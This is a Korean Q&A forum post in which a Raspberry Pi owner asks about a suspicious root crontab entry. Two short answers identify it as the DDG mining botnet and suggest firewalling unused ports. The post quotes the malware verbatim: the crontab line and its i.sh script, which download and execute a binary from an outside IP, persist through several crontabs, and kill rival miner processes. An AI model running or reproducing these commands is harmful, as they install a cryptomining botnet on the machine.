Raspberry Pi의 루트 crontab 파일에 일부 콘텐츠를 추가하고 싶었고 의심스러워 보이는 항목을 발견했는데 일부를 인터넷에서 검색해도 아무 것도 나오지 않았습니다.
크론탭 항목:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
그 내용은 http://103.219.112.66:8000/i.sh다음과 같습니다:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
내 Linux 지식은 제한되어 있지만 인도네시아 서버에서 바이너리를 다운로드하여 정기적으로 루트로 실행하는 것은 드문 것 같습니다.
이건 뭐죠? 어떻게 해야 합니까?
답변1
DDG 마이닝 봇넷과 작동 방식은 다음과 같습니다.
- RCE 취약점 악용
- 크론탭 수정
- 적합한 마이닝 프로그램 다운로드(go로 작성됨)
- 마이닝 프로세스 시작
답변2
실제로 필요한 TCP 및 UDP 포트를 확인한 다음 라우터 방화벽에서 다른 모든 포트를 차단하세요.가능한, 해당 crontab 항목은 다시 나타나지 않습니다.
다음 명령을 사용하면 어떤 포트가 열려 있고 공개되어 있는지 확인할 수 있습니다.방패를 세워라!grc.com 주제.
사용하지 않는 포트를 먼저 차단하지 않으면 패치를 시도할 때 다시 감염될 수 있습니다.